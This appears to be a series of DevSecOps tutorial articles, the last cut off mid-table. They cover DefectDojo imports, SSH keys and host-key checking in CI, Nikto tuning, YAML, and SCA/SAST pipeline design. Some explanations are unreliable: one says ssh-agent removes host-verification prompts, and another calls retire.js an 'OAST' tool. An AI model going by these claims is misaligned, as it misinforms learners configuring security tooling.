Managing IDs, Environments, and Compatibility in DefectDojo

Managing IDs, Environments, and Compatibility in DefectDojo DefectDojo is a powerful open‑source platform for aggregating, normalizing, and tracking security findings across many tools and pipelines. Learners often wonder how to locate key identifiers (engagement, project, lead), which scans belong to SAST versus DAST, whether specific tools such as InSpec or TruffleHog integrate smoothly, and how to troubleshoot missing data after an automated upload. This article walks through each of those topics step‑by‑step, provides practical examples, and offers quick‑reference tips for a smooth DevSecOps workflow. 1. Retrieving Core IDs (Engagement, Project, Lead) Every finding in DefectDojo is tied to three primary objects: | Object | Purpose | Where to Find It | |--------|---------|------------------| | Project | Top‑level container for a product or application | Products → Product List → click the product; URL contains product_id= | | Engagement | Represents a specific test window (e.g., a quarterly SAST run) | Engagements → Engagement List → click the engagement; URL contains engagement_id= | | Lead | The user who owns or is responsible for the engagement | Inside the engagement detail page under Lead field (user ID appears in the URL as lead=) | Quick CLI/Script Method If you prefer automation, the DefectDojo REST API can return these IDs in JSON: # Example: Get all engagements for a product curl -s -H "Authorization: Token $DD_API_KEY" \ "https://dojo.example.com/api/v2/engagements/?product=$PRODUCT_ID" \ | jq '.results[] | {id: .id, name: .name, lead: .lead}' Replace $DD_API_KEY and $PRODUCT_ID with your token and product ID. The output lists each engagement’s id and the associated lead user ID. 2. Understanding Which Scans Belong to SAST vs. DAST DefectDojo does not enforce a strict taxonomy, but the exam and real‑world practice follow common industry conventions: | Category | Typical Tools (examples) | What They Scan | |----------|--------------------------|----------------| | SAST (Static Application Security Testing) | bandit, semgrep, trufflehog, secret-scan | Source code, configuration files, embedded secrets | | DAST (Dynamic Application Security Testing) | sslyze, nikto, nmap, OWASP ZAP | Running applications, network services, SSL/TLS configurations | Tip: When a practice‑test question mentions “implement SAST,” you can safely assume it expects a static analysis tool (e.g., secret scanning) rather than a network scanner. 3. Compatibility of InSpec Results with DefectDojo Native Support DefectDojo includes a built‑in parser for InSpec compliance reports. To use it: 1. Export the InSpec run as JSON: inspec exec . --reporter json:inspec-report.json 2. Upload the JSON file via the Import Scan UI or through the API (/api/v2/import-scan/). Other “Code‑as‑Configuration” (CaC) Tools If a tool does not have a dedicated parser, you can still ingest its output by: - Converting the report to a supported format (e.g., JUnit XML, SARIF, or generic JSON). - Using the Generic Findings Importer in DefectDojo, which maps custom fields to the standard schema. A curated list of supported parsers is maintained at the official documentation site: DefectDojo Integrations – File Parsers 4. Uploading TruffleHog Scan Results from CI/CD Common Pitfall When a CI job reports “upload successful” but only the file name appears in DefectDojo (no findings), the most likely cause is an incorrect output format. DefectDojo expects the JSON representation of TruffleHog results. Step‑by‑Step Troubleshooting 1. Generate JSON Locally trufflehog git file://$(pwd) --json > trufflehog-report.json 2. Validate the JSON – open it in a text editor; you should see an array of objects with path, reason, line, etc. 3. Manual GUI Test - Navigate to Findings → Import Scan. - Choose TruffleHog as the parser, upload trufflehog-report.json, and click Import. - Verify that individual findings appear. 4. CI/CD Integration - Ensure the pipeline step uses the JSON file, not the default plain‑text output. - Example (GitLab CI): trufflehog_scan: script: - trufflehog git file://$CI_PROJECT_DIR --json > trufflehog.json - curl -X POST "$DD_API_URL/api/v2/import-scan/" \ -H "Authorization: Token $DD_API_KEY" \ -F "file=@trufflehog.json" \ -F "scan_type=TruffleHog" 5. Confirm Permissions – the API token must have Import Scan scope for the target product/engagement. If the issue persists after these steps, capture the API response (status code and body) and share it with the support team for deeper analysis. 5. Practical Example: End‑to‑End SAST Workflow 1️⃣ Code commit → GitHub Action runs Semgrep (SAST) → generates SARIF report. 2️⃣ Action calls DefectDojo API: POST /api/v2/import-scan/ - file: semgrep-report.sarif - scan_type: "Semgrep" - engagement: 42 - lead: 7 3️⃣ DefectDojo creates findings, links them to Engagement #42, and notifies Lead #7. 4️⃣ Lead reviews findings, marks false positives, and closes the engagement. This flow illustrates how IDs, scan type, and tool compatibility all intersect in a real pipeline. 6. Common Questions & Quick Tips | Question | Answer | |----------|--------| | How do I know which parser to select in the UI? | Look at the file extension and the tool name. The UI lists supported parsers alphabetically; hover for a short description. | | Can I import multiple scan files at once? | Yes. Zip the files together and select “Multiple Files” import; each file will be parsed individually. | | What if my tool isn’t listed? | Convert the output to SARIF or JUnit XML, both of which have generic parsers. | | Do I need a separate engagement for each scan type? | Not required, but recommended for reporting clarity (e.g., one engagement for quarterly SAST, another for monthly DAST). | | How to automate ID discovery in scripts? | Use the REST endpoints /api/v2/products/, /api/v2/engagements/, and /api/v2/users/ with jq or any JSON parser. | Pro Tips - Bookmark the parser reference page – it’s updated with every new release. - Tag each engagement with a meaningful name (e.g., Q4‑2025‑SAST) to locate IDs quickly. - Enable webhook notifications for new findings so leads receive instant alerts. 7. Next Steps 1. Review the Practice Exam Solutions for concrete examples of SAST/DAST mapping. 2. Test the InSpec and TruffleHog import processes in a sandbox environment before adding them to production pipelines. 3. Automate ID retrieval with a small Python script that stores project_id, engagement_id, and lead_id in environment variables for CI jobs. By mastering ID handling, understanding scan categories, and confirming tool compatibility, you’ll keep your DefectDojo instance clean, actionable, and ready for any DevSecOps certification exam or real‑world deployment. Happy scanning!

Last updated on Jan 06, 2026

Ansible Playbooks & CI/CD Pipelines: SSH Handling, YAML Structure, and Playbook Elements Explained

Ansible Playbooks & CI/CD Pipelines: SSH Handling, YAML Structure, and Playbook Elements Explained Introduction When you start automating infrastructure with Ansible inside a CI/CD pipeline, you quickly encounter two recurring topics: how to manage SSH authentication without manual prompts and how to write a valid playbook.yml file. Both are essential for reliable, repeatable deployments. This article breaks down the reasoning behind using ssh‑add (or ssh-agent) instead of simply copying a private key, clarifies the YAML syntax that defines a playbook, and explains the purpose of key sections such as name, hosts, and roles. By the end, you’ll have a solid reference you can apply to any Ansible‑based DevSecOps lab or certification exercise. 1. SSH Authentication in CI/CD Pipelines 1.1 Why not just copy the private key to ~/.ssh? In a typical development workstation you might place a private key (id_rsa) in ~/.ssh and use it directly. In a CI/CD runner, however, the environment is ephemeral and non‑interactive. When Ansible tries to connect to a remote host, the SSH client may still ask for a passphrase or confirmation (e.g., “Are you sure you want to continue connecting (yes/no)?”). Because the pipeline cannot respond to prompts, the job would fail. 1.2 The role of ssh-agent and ssh-add Running an SSH agent creates a background process that holds the private key in memory. The command ssh-add loads the key into that agent. Once loaded: - The key is available to any subsequent SSH command without reading it from the filesystem each time. - Passphrase‑protected keys can be supplied once (or stored in a CI secret) and then reused automatically. - The agent eliminates the “first‑time host verification” prompt when you also pre‑populate known_hosts. In practice, the CI step looks like this: stage: prod image: willhallonline/ansible:2.9-ubuntu-18.04 before_script: # 1️⃣ Create the .ssh directory - mkdir -p ~/.ssh # 2️⃣ Write the secret private key (provided as a CI variable) to a file - echo "$DEPLOYMENT_SERVER_SSH_PRIVKEY" | tr -d '\r' > ~/.ssh/id_rsa - chmod 600 ~/.ssh/id_rsa # 3️⃣ Start the SSH agent and load the key - eval "$(ssh-agent -s)" - ssh-add ~/.ssh/id_rsa If you remove the ssh-agent/ssh-add lines and run the pipeline, you’ll see the job stall on an SSH prompt, confirming the necessity of the agent in automated environments. 1.3 Quick tip Store the private key as a protected CI variable (e.g., DEPLOYMENT_SERVER_SSH_PRIVKEY) and never commit it to source control. 2. Understanding the YAML Structure of an Ansible Playbook 2.1 Lists vs. Mappings in YAML YAML distinguishes two fundamental data structures: | Structure | Symbol | Example | |-----------|--------|---------| | Mapping (key‑value pair) | : | hosts: prod | | List (ordered collection) | - (hyphen) | - name: Install Terraform | A playbook is a list of plays. Each play is a mapping that contains keys such as name, hosts, remote_user, become, roles, and tasks. Because the playbook itself is a list, the first line of every play starts with a hyphen. - name: Deploy web tier hosts: webservers become: true roles: - nginx - monitoring - The hyphen before name tells YAML “this is the first item in the outer list (the play).” - Inside the play, keys (hosts, become, etc.) are mappings, so they do not use hyphens. 2.2 When to add a hyphen | Context | Use a hyphen? | Reason | |---------|---------------|--------| | Beginning of a play (top‑level) | Yes | Starts a new item in the playbook list. | | Defining a role or task within a play | Yes | Each role or task is an element of its own list (roles: or tasks:). | | Simple key/value pair like hosts: or remote_user: | No | These are mappings inside the current play. | 3. Key Playbook Elements Explained 3.1 name – Human‑readable identifier - What it is: A descriptive label for the play (or for a task/role). - Why it matters: Makes ansible-playbook output readable and helps teammates understand the intent without digging into the code. - name: "Provision AWS EC2 instances" hosts: localhost ... 3.2 hosts – Target inventory group - What it is: The inventory pattern that selects which machines the play runs against. - Why no hyphen: hosts is a key inside the play’s mapping, not an item of a list. hosts: prod # selects the “prod” group from your inventory 3.3 roles – Reusable collections of tasks, handlers, vars, etc. - What it is: A list of role names (often pulled from Ansible Galaxy). - Why hyphenated: Each role is an element in the roles list. roles: - secfigo.terraform # first role - mycompany.firewall # second role 3.4 tasks – Individual actions - What it is: A list of task dictionaries, each with its own name and module call. tasks: - name: Ensure firewalld is latest apt: name: firewalld state: latest 4. Practical Example: Minimal Playbook for Hardening a Docker Host --- - name: Harden Docker host (CI/CD friendly) hosts: docker_host remote_user: ansible become: true # 1️⃣ Load the SSH key via the pipeline (see Section 1) # 2️⃣ Apply hardening role from Galaxy roles: - secfigo.docker_hardening # 3️⃣ Optional custom tasks tasks: - name: Verify firewalld is active service: name: firewalld state: started Notice the hyphen before name (starting a new play) and before each role and task (list items). 5. Common Questions & Tips Q1: Do I still need ssh-agent if my private key has no passphrase? A: Not strictly, but using an agent is a best practice because it centralizes key handling and avoids accidental exposure of the key file to other processes. Q2: Can I mix hyphenated and non‑hyphenated lines inside a play? A: Yes. Only list items need hyphens. All other key/value pairs remain plain mappings. Q3: What happens if I forget a hyphen before a role? A: Ansible will treat roles: as a mapping with a single string value, causing a syntax error like “list object has no attribute 'items'”. Tip: Validate YAML early ansible-playbook --syntax-check playbook.yml Running the syntax check in your CI pipeline catches indentation or hyphen mistakes before the job proceeds to actual deployment. Conclusion Managing SSH authentication with ssh-agent and ssh-add ensures your CI/CD pipelines stay non‑interactive and secure. Understanding YAML’s distinction between lists (hyphen‑prefixed) and mappings (colon‑separated) lets you craft clean, error‑free Ansible playbooks. By mastering the roles of name, hosts, and roles, you’ll write playbooks that are both human‑readable and machine‑ready—key skills for any DevSecOps professional. Keywords: Ansible playbook, CI/CD SSH handling, ssh-agent, yaml list hyphen, ansible roles, devsecops automation

Last updated on Jan 06, 2026

Optimizing Dynamic Application Security Testing (DAST) with Nikto: Speed, Configuration, and Best Practices

Optimizing Dynamic Application Security Testing (DAST) with Nikto: Speed, Configuration, and Best Practices Dynamic Application Security Testing (DAST) is a cornerstone of modern DevSecOps pipelines. Tools like Nik​to provide powerful vulnerability discovery for web applications, but they can become a bottleneck if not tuned correctly. This article explains how to keep DAST scans fast and reliable in CI/CD, how to configure Nikto to skip irrelevant ports or plugins, and how to resolve common configuration errors—especially when generating CSV reports. Introduction Running a DAST scan on every commit gives developers rapid feedback on security flaws, but a scan that takes 30 minutes or more defeats the purpose of continuous integration. By focusing the scan on high‑risk assets, parallelizing work, and fine‑tuning Nikto’s configuration, you can achieve accurate results without slowing down your pipeline. Below you’ll find step‑by‑step guidance, practical examples, and troubleshooting tips that work for both commercial scanners and the open‑source Nikto tool. 1. Reducing DAST Scan Time in CI/CD Pipelines 1.1 Scan Only What Matters | Action | Why it Helps | How to Implement | |--------|--------------|------------------| | Target critical paths | Eliminates low‑value URLs that inflate scan duration. | Identify the most exposed endpoints (login, API, file upload) and feed them to the scanner via a whitelist or a “focus list.” | | Limit the attack surface | Fewer ports, protocols, and technologies to probe. | Use SKIPPORTS and SKIPIDS (see Section 2) to ignore known safe services. | | Prioritize high‑severity plugins | Concentrates resources on likely exploitable issues. | Configure the scanner to run only “critical” or “high” rule sets. | 1.2 Parallelize Scans - Split the application into logical components (e.g., micro‑services, separate domains) and run independent scans in parallel CI jobs. - Use your CI platform’s matrix strategy (GitHub Actions, GitLab CI, Azure Pipelines) to launch multiple Nikto instances simultaneously, each with its own -h target. 1.3 Leverage Passive Scanning If your commercial DAST solution offers a passive mode, enable it for every build. Passive scans analyze traffic logs or proxy data without actively probing the target, providing quick insights while a full active scan runs on a scheduled basis (e.g., nightly). 1.4 Review the Scan Strategy - Some tools use exhaustive crawling that repeats the same request many times. - Contact the vendor’s support to request a lighter scan profile or to verify that the tool isn’t misconfigured (e.g., default timeout values set too high). 1.5 When to Consider an Alternative If the commercial scanner cannot meet your time constraints after optimization, evaluate lighter open‑source alternatives (Nikto, OWASP ZAP, w3af) for fast “smoke‑test” scans, reserving the heavyweight scanner for deep, scheduled assessments. 2. Configuring Nikto to Skip Ports and Plugins 2.1 Skipping Known‑Safe Ports # nikto.conf SKIPPORTS=21 22 111 Scenario: Your internal server must expose SSH on port 22. Scanning port 22 will always return a “open” result, which you already know is intentional. By adding 22 to SKIPPORTS, Nikto ignores it, reducing false‑positive noise and scan time. 2.2 Skipping Unwanted Plugin IDs Each Nikto vulnerability check has a unique ID (e.g., 1010 for “Silverstream”). If a component is not present in your environment, you can suppress its output: # nikto.conf SKIPIDS=1010,1025 # 1010 = Silverstream, 1025 = Another false positive Result: Nikto will not execute those checks, preventing irrelevant findings and speeding up the scan. 2.3 Combining Options A typical configuration file for a fast CI scan might look like: # nikto.conf – minimal CI/CD configuration SKIPPORTS=21 22 111 SKIPIDS=1010,1025 # Optional: limit the number of concurrent threads THREADS=5 3. Generating CSV Output – Fixing the “CSV configuration seems to be incorrect” Error 3.1 Understanding the Error Nikto expects the output format and file name to be passed either via command‑line options or through the CLIOPTS variable in the configuration file. Mixing both without proper syntax triggers the “CSV configuration seems to be incorrect” message. 3.2 Correct Configuration Example Create or overwrite nikto.conf with the required CLI options: cat > /opt/nikto/nikto.conf <<EOF SKIPPORTS=21 22 111 CLIOPTS="-output result.csv -Format csv" EOF 3.3 Running the Scan ./nikto.pl -config /opt/nikto/nikto.conf -h prod-d3x3q35y What changed? - CLIOPTS now contains the exact flags (-output and -Format) that Nikto needs to produce a CSV file. - No additional -Format or -o arguments are required on the command line, preventing duplicate or conflicting parameters. 3.4 Verifying the Output After the scan completes, you should find result.csv in the working directory. Open it with any spreadsheet program to confirm that headers and rows are correctly formatted. 4. Best‑Practice Checklist for DAST with Nikto - Define a scope: List critical URLs, ports, and services. - Create a minimal nikto.conf: Use SKIPPORTS, SKIPIDS, and CLIOPTS. - Run scans in parallel: Split large applications into separate CI jobs. - Use passive scans for every commit; schedule full scans nightly. - Monitor scan duration: Set CI job timeouts and alert on regressions. - Review false positives regularly and update SKIPIDS accordingly. - Document changes: Keep a version‑controlled copy of nikto.conf alongside your codebase. Common Questions | Question | Answer | |----------|--------| | Why does my scan still take >30 min after skipping ports? | Check for deep crawling (large site maps) and limit the -maxdepth flag, or split the site into smaller targets. | | Can I skip entire directories? | Yes. Use the -exclude option (e.g., -exclude /admin) or add the corresponding plugin IDs to SKIPIDS. | | Is CSV the only machine‑readable format? | Nikto also supports XML, HTML, and JSON (-Format json). Choose the format that integrates best with your reporting tools. | | How do I know the plugin ID for a false positive? | The scan output includes an ID column (e.g., 1010). Use that number in SKIPIDS. | Tips for a Smooth CI/CD Integration 1. Store nikto.conf in source control – ensures every pipeline run uses the same baseline. 2. Cache Nikto’s plugin database between builds to avoid re‑downloading files. 3. Fail fast – configure the CI job to abort if the scan exceeds a predefined duration (e.g., 10 minutes) and raise a warning instead of a hard failure. 4. Automate report parsing – use a small script to extract only high‑severity findings from the CSV and post them to your Slack or Teams channel. Conclusion By narrowing the scan scope, parallelizing execution, and mastering Nikto’s configuration options (SKIPPORTS, SKIPIDS, CLIOPTS), you can keep DAST scans fast, accurate, and CI‑friendly. Implement the checklist and tips above to turn security testing into a seamless part of your DevSecOps workflow—delivering rapid feedback without sacrificing coverage.

Last updated on Jan 07, 2026

YAML Formatting, SSH Configuration, and Carriage Return Characters: Essentials for DevSecOps Learners

YAML Formatting, SSH Configuration, and Carriage Return Characters: Essentials for DevSecOps Learners Understanding the fundamentals of file editing is a cornerstone of any DevSecOps workflow. Whether you are crafting CI/CD pipelines with YAML, tweaking your SSH client settings, or handling text‑file line endings, a solid grasp of these concepts prevents frustrating errors and keeps your automation reliable. This article walks you through three common topics that often appear in labs and certification exams: 1. Why YAML spacing and indentation matter 2. What the echo "StrictHostKeyChecking accept-new" >> ~/.ssh/config command does 3. The role of carriage‑return characters (\r) in text processing Each section includes clear explanations, practical examples, and tips to help you apply the knowledge immediately. 1. YAML Formatting and Indentation – Why It’s Critical 1.1 The YAML Basics You Need to Know - YAML = “YAML Ain’t Markup Language” – a human‑readable data‑serialization format used for configuration files, CI/CD pipelines, Kubernetes manifests, and more. - Indentation defines structure – unlike JSON or XML, YAML relies on spaces (never tabs) to indicate hierarchy. A misplaced space can turn a valid file into an unreadable one. 1.2 Common Indentation Pitfalls | Symptom | Typical Cause | Quick Fix | |---------|---------------|-----------| | expected <block end> error | Inconsistent number of spaces | Use 2‑space or 4‑space indentation consistently throughout the file. | | Keys appear as strings with quotes | Unnecessary quoting of simple keys | Remove quotes unless the key contains special characters. | | “mapping values are not allowed here” | Mixing tabs and spaces | Convert all tabs to spaces (most editors have a “Convert tabs to spaces” option). | 1.3 Practical Example # Correct indentation (2 spaces per level) pipeline: stages: - name: Build script: | mvn clean install - name: Test script: | mvn test If the script line were indented with a tab or an extra space, the CI/CD engine would reject the file. 1.4 Tips for Maintaining Proper Indentation 1. Use an editor with YAML linting – VS Code, PyCharm, or Sublime Text can highlight indentation errors in real time. 2. Copy‑and‑paste from trusted sources – When you paste a snippet, use the “Paste as plain text” option to preserve spaces. 3. Leverage the hint button in labs – Many learning platforms provide a “Hint” that pastes correctly indented YAML directly into your terminal. 2. Understanding the SSH Config Command 2.1 Command Breakdown echo "StrictHostKeyChecking accept-new" >> ~/.ssh/config | Part | Explanation | |------|-------------| | echo "StrictHostKeyChecking accept-new" | Prints the string StrictHostKeyChecking accept-new to standard output. | | >> | Appends the output to the file on the right side (creates the file if it doesn’t exist). | | ~/.ssh/config | The per‑user SSH client configuration file. | 2.2 What the Setting Does - StrictHostKeyChecking accept-new tells the SSH client to automatically add unknown host keys to ~/.ssh/known_hosts without prompting the user. - This is especially useful in automated pipelines where interactive prompts would stall the job. 2.3 When to Use It (and When Not to) | Scenario | Recommended? | Reason | |----------|--------------|--------| | Automated CI runners that need to SSH into fresh VMs | ✅ | Eliminates manual host‑key verification. | | Production environments with strict security policies | ❌ | Bypassing host‑key verification can expose you to man‑in‑the‑middle attacks. | | Temporary test environments | ✅ | Convenience outweighs the minimal risk. | 2.4 Example: Adding the Setting Safely # Ensure the .ssh directory exists and has proper permissions mkdir -p ~/.ssh chmod 700 ~/.ssh # Append the setting (creates config if missing) echo "StrictHostKeyChecking accept-new" >> ~/.ssh/config # Verify the line was added grep "StrictHostKeyChecking" ~/.ssh/config 3. Carriage Return Characters (\r) – What They Are and Why They Matter 3.1 Definition - Carriage Return (CR) – a control character represented as \r (ASCII 13). Historically, it moved the cursor back to the start of the line on a typewriter or terminal. 3.2 How CR Interacts with Line Feeds (\n) | Operating System | Typical Line Ending | |------------------|---------------------| | Windows | \r\n (CR + LF) | | Unix/Linux/macOS| \n (LF only) | | Classic Mac OS | \r (CR only) | When a file contains the wrong line ending for the platform, tools may misinterpret the content, leading to errors such as “command not found” in shell scripts. 3.3 Real‑World Scenarios - Script failures on Linux – A Bash script edited on Windows may contain \r characters, causing each line to end with an invisible \r. The shell sees #!/bin/bash\r and throws a “bad interpreter” error. - CI log clutter – Carriage returns can overwrite previous log lines, making debugging harder. 3.4 Detecting and Removing CR Characters # Show hidden characters with cat -v cat -v myscript.sh | grep '\r' # Remove CRs using dos2unix (install via package manager if needed) dos2unix myscript.sh # Alternatively, use sed sed -i 's/\r$//' myscript.sh 3.5 Best Practices - Configure your editor to use LF line endings for code that runs on Linux containers. - Add a pre‑commit hook (e.g., using pre-commit or husky) that runs dos2unix on staged files. - Validate line endings in CI pipelines with a simple grep -P '\r' step. Common Questions & Quick Tips Q1: Can I use tabs instead of spaces in YAML? A: No. YAML specifications require spaces only. Most parsers will reject files containing tabs. Q2: Will appending StrictHostKeyChecking accept-new overwrite existing config? A: The >> operator appends; it never overwrites. If you need to replace an existing line, edit the file manually or use sed. Q3: Is it safe to remove all \r characters from a file? A: Generally, yes, for scripts and configuration files intended for Unix-like environments. Be cautious with files that deliberately use \r (e.g., legacy Windows batch files). Quick Tip Checklist - YAML: 2‑space indentation, no tabs, validate with a linter. - SSH Config: Use >> to append safely; verify with grep. - Carriage Returns: Run dos2unix before committing code that runs on Linux. Takeaway Mastering file formatting—whether it’s YAML indentation, SSH client configuration, or handling carriage returns—prevents a cascade of avoidable errors in your DevSecOps pipelines. Apply the examples and tips above in your labs, and you’ll spend less time debugging and more time building secure, automated solutions.

Last updated on Jan 07, 2026

Designing Secure Systems: Data Flow Diagrams, SCA/SAST Pipelines, and Local Tool Setup

Designing Secure Systems: Data Flow Diagrams, SCA/SAST Pipelines, and Local Tool Setup Creating secure, maintainable applications requires a solid foundation in three interconnected areas: visualising trust boundaries with Data Flow Diagrams (DFDs), building robust SCA (Software Component Analysis) and SAST (Static Application Security Testing) pipelines, and validating security tools locally before they hit production CI/CD. This article walks you through the essential considerations, practical steps, and best‑practice tips that every DevSecOps professional should know. 1. Data Flow Diagrams – What to Include and Where 1.1 Why DFDs Matter A DFD is a visual language that helps you communicate trust zones, component responsibilities, and data movement. There are no rigid standards dictating layout or symbols, but clarity is the only rule that truly matters. 1.2 Core Elements to Capture | Element | What to Show | Typical Placement | |---------|--------------|-------------------| | External Entities | Users, third‑party services, or any system outside your control | Outside the perimeter (e.g., “Internet”, “Partner API”) | | Trust Boundaries | Zones where security controls change (DMZ, internal network, cloud VPC) | Use distinct boxes or colour‑coded borders | | Processes / Services | APIs, micro‑services, databases, queues, etc. | Inside the appropriate trust zone | | Data Stores | Persistent storage (SQL, NoSQL, object buckets) | Usually depicted as cylinders or rectangles | | Data Flows | Directional arrows showing the movement of information | Connect entities, processes, and stores; label with data type (e.g., “JWT token”, “user credentials”) | 1.3 Practical Example Scenario: An e‑commerce platform receives orders through a public API Gateway. - Internet → API Gateway (trust boundary: public DMZ) - API Gateway → Order Service (internal network) - Order Service ↔ Order DB (data store) - Order Service → Payment Provider (external entity) By placing the API Gateway at the internet boundary, the diagram instantly highlights where inbound traffic is inspected, where TLS termination occurs, and where additional security controls (WAF, rate limiting) should be applied. 2. Building a Pipeline for SCA and SAST 2.1 Understanding the Scope When an exam or a real‑world requirement says “build a pipeline for SCA and SAST,” it expects you to address both frontend and backend codebases and to include secret scanning as part of the SAST step. 2.2 Recommended Pipeline Structure 1. Source Checkout – Pull the latest commit from the repository. 2. Dependency Scanning (SCA) - Frontend – Run tools like npm audit, OWASP Dependency‑Check, or Snyk against package.json/yarn.lock. - Backend – Run language‑specific scanners (e.g., Maven Dependency Plugin, pip‑audit, Gradle Dependency Check). 3. Static Code Analysis (SAST) - General SAST – Use tools such as SonarQube, Checkmarx, or CodeQL to detect vulnerable patterns. - Secret Scanning – Add a dedicated step (e.g., GitLeaks, TruffleHog, Detect Secrets) to catch API keys, passwords, or certificates embedded in the code. 4. Policy Evaluation – Fail the build if high‑severity findings exceed a defined threshold. 5. Reporting – Publish results to a dashboard, Slack channel, or pull‑request comment for developer visibility. 2.3 Sample YAML Snippet (GitHub Actions) name: Secure Build on: [push, pull_request] jobs: sca-frontend: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Run npm audit run: npm audit --audit-level=high sca-backend: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Run Maven Dependency Check run: mvn org.owasp:dependency-check-maven:check -DfailOnCVSS=7 sast: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Run CodeQL Analysis uses: github/codeql-action/analyze@v2 - name: Secret Scan with Gitleaks uses: zricethezav/gitleaks-action@v1 The pipeline clearly separates frontend SCA, backend SCA, SAST, and secret scanning, satisfying the “separate scans” requirement. 3. Local Tool Testing – Installation vs. Docker 3.1 Why Test Locally? Running a tool locally helps you: - Verify CLI arguments, environment variables, and exit codes. - Detect dependency conflicts before they break CI/CD. - Fine‑tune performance (e.g., memory limits, parallelism). 3.2 Two Integration Paths | Approach | How It Works | When to Choose It | |----------|--------------|-------------------| | Direct Installation + Scan | Install the binary or package on the build agent, then invoke it directly. | Ideal for tools that need deep OS integration (e.g., native compilers, custom plugins). | | Docker Run + Scan | Pull a pre‑built Docker image, mount the source code, and execute the scan inside the container. | Perfect for isolated environments, version‑locked tooling, or when you want a “run‑anywhere” guarantee. | 3.3 Local Test Checklist 1. Choose the integration path (installation vs. Docker). 2. Run a quick scan on a small test repo: - Verify the tool exits with 0 for clean code and non‑zero for findings. - Capture the output format (JSON, SARIF, plain text). 3. Validate CI/CD compatibility: - For installation, script the install step (apt-get, brew, pip, etc.). - For Docker, confirm the image size and required runtime flags (--network=none, -v $PWD:/src). 4. Document the exact command you will later copy into the pipeline YAML. 3.4 Example: Running Trivy via Docker docker run --rm -v $(pwd):/project aquasec/trivy fs /project \ --severity HIGH,CRITICAL --format sarif -o trivy-results.sarif If this command succeeds locally, you can safely embed the same Docker run step in your CI job. 4. Tips & Best Practices - Label every DFD arrow with the data type and sensitivity level (e.g., “PII – encrypted”). - Separate SCA and SAST stages to keep logs clean and make failure analysis easier. - Fail fast: set low thresholds for high‑severity findings to prevent vulnerable code from progressing. - Cache Docker images in CI to reduce build time, but always pull the latest version for security tools. - Automate secret rotation: when a secret scan flags a credential, trigger an automated rotation workflow. 5. Common Questions | Question | Answer | |----------|--------| | Do I need to draw every micro‑service on a DFD? | Focus on trust boundaries and data that crosses them. Minor internal calls can be omitted if they stay within the same security zone. | | Can I run SCA and SAST in the same CI job? | Technically possible, but separating them improves parallelism, error isolation, and report clarity. | | Is Docker the only way to avoid manual installs? | No. You can also use package managers (apt, yum, brew) or binary releases, but Docker provides the cleanest isolation for most security tools. | | What if a secret scanner flags a false positive? | Review the finding, add an allow‑list entry if it’s a known benign pattern, and document the decision in your security policy. | 6. Final Thoughts Designing secure systems is a continuous, visual, and automated effort. By mastering clear DFDs, constructing comprehensive SCA/SAST pipelines, and rigorously testing tools locally—whether via direct installation or Docker—you lay a strong foundation for resilient DevSecOps practices. Use the guidelines above as a checklist for every new project, and you’ll consistently deliver secure, compliant software that stands up to both exams and real‑world threats.

Last updated on Jan 06, 2026

Integrating Software Component Analysis (SCA) and OAST into Your CI/CD Build Pipeline

Integrating Software Component Analysis (SCA) and OAST into Your CI/CD Build Pipeline Introduction Securing modern applications requires more than a single scan or a one‑time review. Both Software Component Analysis (SCA) and Open Application Security Testing (OAST) play complementary roles in identifying vulnerabilities early and continuously. This article explains how SCA and OAST fit together, how they map to typical CI/CD jobs (build, test, and oast‑frontend), and when you should run security tools directly on the host versus inside a Docker container. By the end, you’ll have a clear, step‑by‑step guide you can copy into your own pipeline configuration. 1. Understanding the Relationship Between SCA and OAST | Aspect | Software Component Analysis (SCA) | Open Application Security Testing (OAST) | |--------|-----------------------------------|------------------------------------------| | Primary focus | Identifies known vulnerabilities, license issues, and outdated versions in third‑party libraries and packages. | Actively probes the running application (or its source) for security weaknesses such as XSS, SQLi, insecure configurations, and API exposure. | | Typical output | Bill of Materials (BOM), CVE list, severity scores, remediation recommendations. | Vulnerability findings tied to code paths, request/response traces, and remediation guidance. | | When it runs | Usually before the application is packaged—during dependency resolution or after the build step. | Typically after the application is built and optionally after functional tests, when a testable artifact exists. | | Tool examples | Retire.js, OWASP Dependency‑Check, Snyk, Black Duck. | OWASP ZAP, Burp Suite, Nikto, Arachni. | Key takeaway: SCA secures the ingredients of your software, while OAST secures the final dish. Running both in the same pipeline gives you a holistic view of risk—first you know what you’re shipping, then you verify how it behaves under attack. 2. How the Build, Test, and oast‑frontend Jobs Work Together A typical CI/CD pipeline for a web application might look like this: stage: build → stage: test → stage: oast-frontend 2.1 Build Stage - Goal: Compile source code, resolve dependencies, and produce an artifact (e.g., a Docker image, JAR, or static bundle). - Typical commands: npm install, npm run build, mvn package. - Why it matters for security: The exact versions of third‑party packages are locked in, which SCA tools later analyze. 2.2 Test Stage - Goal: Run unit, integration, and functional tests to verify business logic. - Typical commands: npm test, pytest, go test. - Security relevance: A clean test run ensures that any later security findings are not caused by broken functionality. 2.3 oast‑frontend Stage - Goal: Perform an OAST scan that concentrates on the frontend (JavaScript, CSS, HTML) and on the third‑party dependencies used by the UI. - Typical tool: retire.js – an SCA scanner that focuses on known vulnerable JavaScript libraries. - What happens: 1. The job pulls the built artifact (or the source directory). 2. It runs retire.js against the node_modules folder. 3. Results are saved as a JSON report (retirejs-report.json). By placing oast‑frontend after the test stage, you guarantee that the code you are scanning is the exact version that passed functional verification. 3. Running Security Tools: Docker Container vs. Local CLI You have two common ways to invoke a tool like retire.js in a GitLab CI job: 3.1 Option 1 – Use a pre‑installed image (e.g., node:alpine) and run the CLI directly oast-frontend: stage: test image: node:alpine3.10 # Node + npm are already available script: - npm install # Install project dependencies - npm install -g retire # Install retire.js globally - retire --outputformat json \ --outputpath retirejs-report.json \ --severity high When to choose this: - You need access to the host file system (e.g., node_modules created by the previous build step). - You want to avoid extra Docker‑in‑Docker complexity. - Your CI runner already provides the required runtime (Node, Python, etc.). 3.2 Option 2 – Pull a dedicated security image and run it as a container oast-frontend: stage: test script: - docker pull secfigo/retirejs - docker run -v $(pwd):/src secfigo/retirejs \ retire --outputformat json \ --outputpath retirejs-report.json \ --severity high When to choose this: - You want isolation – the scanning tool runs in its own environment, eliminating version conflicts. - You prefer a single‑purpose image that already contains the tool and its dependencies. - Your pipeline enforces “no‑install‑on‑host” policies for security or compliance reasons. 3.3 Decision Guidance | Consideration | Prefer Image + CLI (node:alpine) | Prefer Dedicated Docker (secfigo/retirejs) | |---------------|-----------------------------------|----------------------------------------------| | Speed | Faster (no extra pull) | 